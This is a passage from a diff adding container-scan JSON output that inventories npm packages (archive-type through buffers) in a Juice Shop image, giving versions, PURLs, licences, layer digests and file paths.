}, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archive-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "archiver@1.3.0", + "Name": "archiver", + "Identifier": { + "PURL": "pkg:npm/archiver@1.3.0", + "UID": "1ae1e3fee02f3b93" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archiver/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "archiver-utils@1.3.0", + "Name": "archiver-utils", + "Identifier": { + "PURL": "pkg:npm/archiver-utils@1.3.0", + "UID": "d68b42ac623cef3e" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archiver-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "are-we-there-yet@1.1.7", + "Name": "are-we-there-yet", + "Identifier": { + "PURL": "pkg:npm/are-we-there-yet@1.1.7", + "UID": "19fdd4a4e41bf032" + }, + "Version": "1.1.7", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/are-we-there-yet/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "are-we-there-yet@3.0.1", + "Name": "are-we-there-yet", + "Identifier": { + "PURL": "pkg:npm/are-we-there-yet@3.0.1", + "UID": "895594c837e9da87" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/are-we-there-yet/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "argparse@1.0.10", + "Name": "argparse", + "Identifier": { + "PURL": "pkg:npm/argparse@1.0.10", + "UID": "ce340d1595bc38b4" + }, + "Version": "1.0.10", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/argparse/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "array-buffer-byte-length@1.0.2", + "Name": "array-buffer-byte-length", + "Identifier": { + "PURL": "pkg:npm/array-buffer-byte-length@1.0.2", + "UID": "79a3f8f73321073" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/array-buffer-byte-length/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "array-each@1.0.1", + "Name": "array-each", + "Identifier": { + "PURL": "pkg:npm/array-each@1.0.1", + "UID": "85ae37500a7f1c04" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/array-each/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "array-flatten@1.1.1", + "Name": "array-flatten", + "Identifier": { + "PURL": "pkg:npm/array-flatten@1.1.1", + "UID": "956134a0af6edf0c" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/array-flatten/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "array-slice@1.1.0", + "Name": "array-slice", + "Identifier": { + "PURL": "pkg:npm/array-slice@1.1.0", + "UID": "a4d4a13e4b32543a" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/array-slice/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "asap@2.0.6", + "Name": "asap", + "Identifier": { + "PURL": "pkg:npm/asap@2.0.6", + "UID": "8d481397d36297fe" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/asap/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "assert-never@1.4.0", + "Name": "assert-never", + "Identifier": { + "PURL": "pkg:npm/assert-never@1.4.0", + "UID": "3c15e5d156fb9891" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/assert-never/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "async@2.6.4", + "Name": "async", + "Identifier": { + "PURL": "pkg:npm/async@2.6.4", + "UID": "f125dc12df52417b" + }, + "Version": "2.6.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archiver/node_modules/async/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "async@2.6.4", + "Name": "async", + "Identifier": { + "PURL": "pkg:npm/async@2.6.4", + "UID": "85d1e1fd7973c615" + }, + "Version": "2.6.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/portscanner/node_modules/async/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "async@3.2.6", + "Name": "async", + "Identifier": { + "PURL": "pkg:npm/async@3.2.6", + "UID": "4703a752803ac28c" + }, + "Version": "3.2.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/async/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "at-least-node@1.0.0", + "Name": "at-least-node", + "Identifier": { + "PURL": "pkg:npm/at-least-node@1.0.0", + "UID": "1d51370ccbbb9854" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/at-least-node/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "available-typed-arrays@1.0.7", + "Name": "available-typed-arrays", + "Identifier": { + "PURL": "pkg:npm/available-typed-arrays@1.0.7", + "UID": "955ea6409f5604c" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/available-typed-arrays/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "babel-walk@3.0.0-canary-5", + "Name": "babel-walk", + "Identifier": { + "PURL": "pkg:npm/babel-walk@3.0.0-canary-5", + "UID": "889cc55c576233e4" + }, + "Version": "3.0.0-canary-5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/babel-walk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "balanced-match@1.0.2", + "Name": "balanced-match", + "Identifier": { + "PURL": "pkg:npm/balanced-match@1.0.2", + "UID": "b17e3d49ebe24a48" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/balanced-match/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "base64-arraybuffer@0.1.4", + "Name": "base64-arraybuffer", + "Identifier": { + "PURL": "pkg:npm/base64-arraybuffer@0.1.4", + "UID": "5ead415a86950855" + }, + "Version": "0.1.4", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/base64-arraybuffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "base64-js@0.0.8", + "Name": "base64-js", + "Identifier": { + "PURL": "pkg:npm/base64-js@0.0.8", + "UID": "e8f5ff7f742adb7f" + }, + "Version": "0.0.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/linebreak/node_modules/base64-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "base64-js@1.5.1", + "Name": "base64-js", + "Identifier": { + "PURL": "pkg:npm/base64-js@1.5.1", + "UID": "63bb8070721d2e69" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/base64-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "base64id@2.0.0", + "Name": "base64id", + "Identifier": { + "PURL": "pkg:npm/base64id@2.0.0", + "UID": "a59d2d19337ae148" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/base64id/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "base64url@0.0.6", + "Name": "base64url", + "Identifier": { + "PURL": "pkg:npm/base64url@0.0.6", + "UID": "cc1ef9638242bfa1" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/base64url/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "basic-auth@2.0.1", + "Name": "basic-auth", + "Identifier": { + "PURL": "pkg:npm/basic-auth@2.0.1", + "UID": "7aed93a141a2566c" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/basic-auth/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "batch@0.6.1", + "Name": "batch", + "Identifier": { + "PURL": "pkg:npm/batch@0.6.1", + "UID": "56da9bad6d758c59" + }, + "Version": "0.6.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/batch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "beep-boop@1.2.3", + "Name": "beep-boop", + "Identifier": { + "PURL": "pkg:npm/beep-boop@1.2.3", + "UID": "614262f58c2496b4" + }, + "Version": "1.2.3", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/github-from-package/example/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "beercss@4.0.21", + "Name": "beercss", + "Identifier": { + "PURL": "pkg:npm/beercss@4.0.21", + "UID": "b491bf8b077ba1b6" + }, + "Version": "4.0.21", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/beercss/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "big-integer@1.6.52", + "Name": "big-integer", + "Identifier": { + "PURL": "pkg:npm/big-integer@1.6.52", + "UID": "6878c20963a82e87" + }, + "Version": "1.6.52", + "Licenses": [ + "Unlicense" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/big-integer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "binary@0.3.0", + "Name": "binary", + "Identifier": { + "PURL": "pkg:npm/binary@0.3.0", + "UID": "fb14cc2b17365b2c" + }, + "Version": "0.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/binary/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bindings@1.5.0", + "Name": "bindings", + "Identifier": { + "PURL": "pkg:npm/bindings@1.5.0", + "UID": "434d7c3ee4c066f" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/bindings/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bintrees@1.0.2", + "Name": "bintrees", + "Identifier": { + "PURL": "pkg:npm/bintrees@1.0.2", + "UID": "434a998697e5a0a0" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/bintrees/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bl@1.2.3", + "Name": "bl", + "Identifier": { + "PURL": "pkg:npm/bl@1.2.3", + "UID": "47f3642df4971ae2" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/bl/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bl@4.1.0", + "Name": "bl", + "Identifier": { + "PURL": "pkg:npm/bl@4.1.0", + "UID": "c363ef76efbaa8a6" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar-fs/node_modules/bl/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bluebird@3.4.7", + "Name": "bluebird", + "Identifier": { + "PURL": "pkg:npm/bluebird@3.4.7", + "UID": "26b8326b4895977e" + }, + "Version": "3.4.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unzipper/node_modules/bluebird/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bluebird@3.7.2", + "Name": "bluebird", + "Identifier": { + "PURL": "pkg:npm/bluebird@3.7.2", + "UID": "2d2b398650dfcf6a" + }, + "Version": "3.7.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/bluebird/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "body-parser@1.20.5", + "Name": "body-parser", + "Identifier": { + "PURL": "pkg:npm/body-parser@1.20.5", + "UID": "9bca9514cc58a657" + }, + "Version": "1.20.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/body-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "brace-expansion@1.1.14", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@1.1.14", + "UID": "76e0be02316fb870" + }, + "Version": "1.1.14", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/brace-expansion/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "brace-expansion@2.1.0", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@2.1.0", + "UID": "cc9f1fb507b52bcb" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/glob/node_modules/brace-expansion/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "braces@3.0.3", + "Name": "braces", + "Identifier": { + "PURL": "pkg:npm/braces@3.0.3", + "UID": "4621272d41feed30" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/braces/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "brotli@1.3.3", + "Name": "brotli", + "Identifier": { + "PURL": "pkg:npm/brotli@1.3.3", + "UID": "c7a4596625603781" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/brotli/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "browserify-zlib@0.2.0", + "Name": "browserify-zlib", + "Identifier": { + "PURL": "pkg:npm/browserify-zlib@0.2.0", + "UID": "8526329dd30ec48e" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/browserify-zlib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer@5.7.1", + "Name": "buffer", + "Identifier": { + "PURL": "pkg:npm/buffer@5.7.1", + "UID": "64769ee076956de7" + }, + "Version": "5.7.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer@6.0.3", + "Name": "buffer", + "Identifier": { + "PURL": "pkg:npm/buffer@6.0.3", + "UID": "19cfc8f3391609f2" + }, + "Version": "6.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-web-to-node-stream/node_modules/buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer-alloc@1.2.0", + "Name": "buffer-alloc", + "Identifier": { + "PURL": "pkg:npm/buffer-alloc@1.2.0", + "UID": "de06753ac59842fa" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer-alloc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer-alloc-unsafe@1.1.0", + "Name": "buffer-alloc-unsafe", + "Identifier": { + "PURL": "pkg:npm/buffer-alloc-unsafe@1.1.0", + "UID": "3d071f24853d48b5" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer-alloc-unsafe/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer-crc32@0.2.13", + "Name": "buffer-crc32", + "Identifier": { + "PURL": "pkg:npm/buffer-crc32@0.2.13", + "UID": "de634282c1b1a882" + }, + "Version": "0.2.13", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer-crc32/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer-fill@1.0.0", + "Name": "buffer-fill", + "Identifier": { + "PURL": "pkg:npm/buffer-fill@1.0.0", + "UID": "10fc562d20c94824" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer-fill/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer-from@1.1.2", + "Name": "buffer-from", + "Identifier": { + "PURL": "pkg:npm/buffer-from@1.1.2", + "UID": "20ade5a099217d52" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer-from/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffer-indexof-polyfill@1.0.2", + "Name": "buffer-indexof-polyfill", + "Identifier": { + "PURL": "pkg:npm/buffer-indexof-polyfill@1.0.2", + "UID": "f6c1ff443505d512" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffer-indexof-polyfill/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "buffers@0.1.1", + "Name": "buffers", + "Identifier": { + "PURL": "pkg:npm/buffers@0.1.1", + "UID": "108a309e385cff9a" + }, + "Version": "0.1.1", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/buffers/package.json", + "AnalyzedBy": "node-pkg" + }, + { + 